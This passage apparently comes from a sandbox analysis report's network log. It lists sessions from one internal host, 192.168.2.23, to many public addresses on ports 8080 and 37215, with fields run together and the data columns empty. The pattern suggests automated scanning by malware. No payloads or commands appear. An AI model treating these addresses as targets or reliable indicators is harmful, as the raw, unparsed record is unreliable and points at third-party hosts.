                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20770192.168.2.233414878.94.52.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20771192.168.2.2336492169.172.187.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20772192.168.2.2357710185.69.45.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20773192.168.2.235402863.169.41.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20774192.168.2.234520495.60.220.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20775192.168.2.2341168175.99.134.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20776192.168.2.2339274109.26.131.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20777192.168.2.234732666.202.173.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20778192.168.2.2355002183.234.100.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20779192.168.2.2349072162.164.70.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20780192.168.2.2348590219.78.18.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20781192.168.2.2338692129.179.136.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20782192.168.2.234223048.114.181.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20783192.168.2.2358228103.125.174.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20784192.168.2.235818653.60.0.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20785192.168.2.235845869.255.121.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20786192.168.2.233325623.17.93.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20787192.168.2.234045618.181.217.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20788192.168.2.2356358110.128.92.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20789192.168.2.2342024219.99.34.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20790192.168.2.2341934115.18.185.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20791192.168.2.233553265.66.122.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20792192.168.2.2334732148.91.134.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20793192.168.2.233567487.23.173.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20794192.168.2.2342658192.125.85.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20795192.168.2.2358356157.121.189.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20796192.168.2.2354730197.141.147.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20797192.168.2.234122841.214.218.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20798192.168.2.235635841.200.220.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20799192.168.2.233505647.37.39.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20800192.168.2.2332906197.40.112.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20801192.168.2.2355228197.34.206.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20802192.168.2.2359752197.1.250.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20803192.168.2.2356134197.144.229.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20804192.168.2.2345950157.251.84.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20805192.168.2.235441041.32.168.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20806192.168.2.2348822157.114.42.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20807192.168.2.2356462197.209.12.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20808192.168.2.23568529.120.212.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20809192.168.2.235722041.22.230.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20810192.168.2.234259241.86.48.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20811192.168.2.233358641.198.97.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20812192.168.2.2345144157.159.250.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20813192.168.2.234424841.5.14.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20814192.168.2.233704041.6.124.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20815192.168.2.234948041.168.64.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20816192.168.2.2335894197.156.36.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20817192.168.2.2338030177.57.138.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20818192.168.2.234920851.249.158.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20819192.168.2.2339002197.206.59.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20820192.168.2.2359774157.48.94.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20821192.168.2.234593041.14.41.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20822192.168.2.233379041.249.226.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20823192.168.2.233833441.208.170.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20824192.168.2.2359240141.53.250.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20825192.168.2.2344938157.184.64.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20826192.168.2.2350918159.54.8.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20827192.168.2.2341542182.44.68.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20828192.168.2.2341100197.122.37.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20829192.168.2.2338888113.52.59.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20830192.168.2.235232441.109.75.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20831192.168.2.235830880.147.14.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20832192.168.2.2345248157.223.207.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20833192.168.2.2332918157.15.173.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20834192.168.2.233970041.43.201.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20835192.168.2.235324441.47.36.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20836192.168.2.2349874197.217.22.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20837192.168.2.234882841.201.132.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20838192.168.2.2352756197.149.27.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20839192.168.2.2351512197.74.199.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20840192.168.2.234878057.34.250.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20841192.168.2.2353442157.240.243.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20842192.168.2.235892041.53.64.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20843192.168.2.2347006197.250.237.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20844192.168.2.234764841.180.184.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20845192.168.2.2333498157.180.120.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20846192.168.2.235243441.54.83.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20847192.168.2.2345230152.26.189.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20848192.168.2.2339088197.188.94.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20849192.168.2.2337804157.113.143.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20850192.168.2.2355854157.241.177.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20851192.168.2.233719241.207.150.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20852192.168.2.2337476203.166.143.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20853192.168.2.2357388197.243.245.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20854192.168.2.2354800188.207.228.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20855192.168.2.2342322197.205.185.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20856192.168.2.2335582197.142.127.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20857192.168.2.2344156197.166.227.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20858192.168.2.234761872.86.57.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20859192.168.2.235936241.239.252.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20860192.168.2.2339270157.189.136.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20861192.168.2.2334278157.143.122.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20862192.168.2.2346070157.22.109.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20863192.168.2.2347400157.67.242.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20864192.168.2.2338936157.146.42.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20865192.168.2.2343838157.132.69.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20866192.168.2.2350366157.0.51.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20867192.168.2.235437241.192.76.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20868192.168.2.235225041.130.106.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20869192.168.2.2354050157.190.179.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20870192.168.2.236060253.103.3.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20871192.168.2.2349292171.227.172.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20872192.168.2.233500641.205.35.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20873192.168.2.2333864157.147.13.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20874192.168.2.2351628197.203.141.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20875192.168.2.2360346157.167.72.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20876192.168.2.233543436.43.138.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20877192.168.2.234141641.57.33.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20878192.168.2.2348908157.184.51.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20879192.168.2.234892623.219.51.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20880192.168.2.235470841.31.209.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20881192.168.2.2340480221.136.52.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20882192.168.2.235303293.27.128.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20883192.168.2.2355856157.236.166.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20884192.168.2.234308441.166.28.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20885192.168.2.234234241.225.89.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20886192.168.2.2353100125.71.231.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20887192.168.2.2350464155.162.198.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20888192.168.2.234737241.125.202.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20889192.168.2.233552641.167.164.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20890192.168.2.234043494.220.134.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20891192.168.2.2352316134.190.49.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20892192.168.2.2343970197.1.198.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20893192.168.2.234487841.137.207.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20894192.168.2.2346594187.87.191.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20895192.168.2.233782841.167.246.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20896192.168.2.2349540148.219.60.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20897192.168.2.2349898197.190.69.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20898192.168.2.2351228157.2.28.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20899192.168.2.2352928157.76.120.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20900192.168.2.233775841.95.163.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20901192.168.2.2347112154.2.218.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20902192.168.2.2336830201.50.242.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20903192.168.2.2347724157.178.237.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20904192.168.2.2342376197.194.188.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20905192.168.2.2346458197.218.102.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20906192.168.2.2339400157.227.202.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20907192.168.2.233375441.63.153.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20908192.168.2.2350540197.18.247.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20909192.168.2.233694641.61.209.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20910192.168.2.235924441.233.147.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20911192.168.2.233321841.236.36.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20912192.168.2.2336064197.111.215.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20913192.168.2.233430475.105.42.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20914192.168.2.2346526197.91.168.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20915192.168.2.234139641.40.32.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20916192.168.2.2339646157.119.108.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20917192.168.2.2333492146.180.219.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20918192.168.2.2359224157.153.191.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20919192.168.2.233808438.183.178.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20920192.168.2.2332906157.100.3.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20921192.168.2.235299461.30.131.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20922192.168.2.2349672157.106.112.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20923192.168.2.2350366157.108.57.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20924192.168.2.2337432197.2.47.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20925192.168.2.2355494157.161.167.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20926192.168.2.2355570197.231.20.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20927192.168.2.234235831.106.146.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20928192.168.2.236004858.20.231.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20929192.168.2.2333738157.115.190.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20930192.168.2.2349440204.184.45.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20931192.168.2.235835859.2.131.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20932192.168.2.234179641.51.90.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20933192.168.2.2355444197.131.51.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20934192.168.2.235610041.221.135.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20935192.168.2.235447641.168.88.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20936192.168.2.2335820197.110.218.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20937192.168.2.234963241.127.159.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20938192.168.2.2357414157.35.33.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20939192.168.2.2336044197.133.109.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20940192.168.2.235069441.147.145.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20941192.168.2.2357722157.46.17.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20942192.168.2.235524495.170.47.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20943192.168.2.2353346157.170.230.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20944192.168.2.2350302157.60.114.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20945192.168.2.2355430219.87.163.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20946192.168.2.2339120197.234.211.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20947192.168.2.2343252157.13.243.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20948192.168.2.2340818157.180.243.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20949192.168.2.2340296160.209.56.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20950192.168.2.2348340159.255.218.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20951192.168.2.2337480197.38.152.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20952192.168.2.236044441.114.194.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20953192.168.2.2343668183.248.30.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20954192.168.2.2353386157.50.238.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20955192.168.2.235735241.223.45.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20956192.168.2.2352500157.118.143.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20957192.168.2.235475041.59.78.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20958192.168.2.2335484197.70.183.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20959192.168.2.233316441.101.255.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20960192.168.2.2352210197.125.146.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20961192.168.2.2335406197.46.174.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20962192.168.2.2353830197.175.160.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20963192.168.2.2335590197.192.154.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20964192.168.2.234483441.131.59.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20965192.168.2.2349754157.83.3.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20966192.168.2.235532891.12.94.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20967192.168.2.233705270.240.106.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20968192.168.2.2340858218.130.98.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20969192.168.2.235653418.25.126.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20970192.168.2.2359164199.112.70.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20971192.168.2.233975866.61.106.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20972192.168.2.235655839.245.66.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20973192.168.2.233395466.208.136.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20974192.168.2.2346754115.60.250.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20975192.168.2.2344242175.177.83.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20976192.168.2.233861842.47.143.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20977192.168.2.2357896122.47.214.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20978192.168.2.233986887.214.226.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
